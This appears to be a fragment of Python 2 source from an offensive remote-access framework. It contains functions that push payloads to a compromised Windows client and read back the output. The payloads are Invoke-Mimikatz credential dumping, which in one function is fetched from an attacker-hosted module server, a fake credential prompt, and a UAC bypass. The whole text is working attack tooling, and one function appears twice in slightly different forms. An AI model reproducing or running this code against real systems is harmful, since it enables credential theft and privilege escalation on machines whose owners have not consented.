def reversePowerShellInvokeMimikatzGeneration(payloadchoice, payloadname): from menu import returnIP moduleport = FUNCTIONS().randomUnusedPort() FUNCTIONS().DoServe(returnIP(), "", "./externalmodules", port=moduleport, printIt=False) powershellScript = payloadchoice % (returnIP(), moduleport) clientnumber = int( clientUpload( payloadname, powershellScript, isExe=False, json= '{"type":"script", "data":"%s", "sendoutput":"true", "multiple":"false"}' )) from stager import returnServerList try: for server in returnServerList(): while True: if server.handlers[clientnumber].in_buffer: print server.handlers[clientnumber].in_buffer.pop() break else: time.sleep(0.1) except KeyboardInterrupt: pass return "pass"
def reversePowerShellInvokeMimikatzGeneration(payloadchoice,payloadname): clientnumber = int(clientUpload(payloadname,payloadchoice,isExe=False,json='{"type":"script", "data":"%s", "sendoutput":"true", "multiple":"false"}')) from stager import returnServerList try: for server in returnServerList(): while True: if server.handlers[clientnumber].in_buffer: print server.handlers[clientnumber].in_buffer.pop() break else: time.sleep(0.1) except KeyboardInterrupt: pass return "pass"
def reversePowerShellAskCredsGeneration(payloadchoice, payloadname): json = '{"type":"script", "data":"%s", "sendoutput":"true", "multiple":"false"}' % ( base64.b64encode(payloadchoice.encode('utf_16_le'))) clientnumber = int(checkClientUpload(payloadname, json, isExe=False)) from stager import returnServerList try: for server in returnServerList(): while True: if server.handlers[clientnumber].in_buffer: print server.handlers[clientnumber].in_buffer.pop() break else: time.sleep(0.1) except KeyboardInterrupt: pass return "pass"
def UACBypassGeneration(payloadchoice,payloadname): win7orwin10 = raw_input(t.bold_red + '[*] Windows 7 or 10?' + t.bold_red + ' 7/[10]:' + t.normal) if not win7orwin10: win7orwin10 = "10" if win7orwin10 == "7": json = '{"type":"uacbypass", "data":"%s", "sendoutput":"true"}'% (base64.b64encode(payloadchoice.encode('utf_16_le'))) else: json = '{"type":"uacbypass", "data":"%s", "sendoutput":"true"}'% (base64.b64encode(payloadchoice.encode('utf_16_le'))) clientnumber = int(checkClientUpload(payloadname,json,isExe=False)) from stager import returnServerList try: for server in returnServerList(): while True: if server.handlers[clientnumber].in_buffer: print server.handlers[clientnumber].in_buffer.pop() break else: time.sleep(0.1) except KeyboardInterrupt: pass return "pass"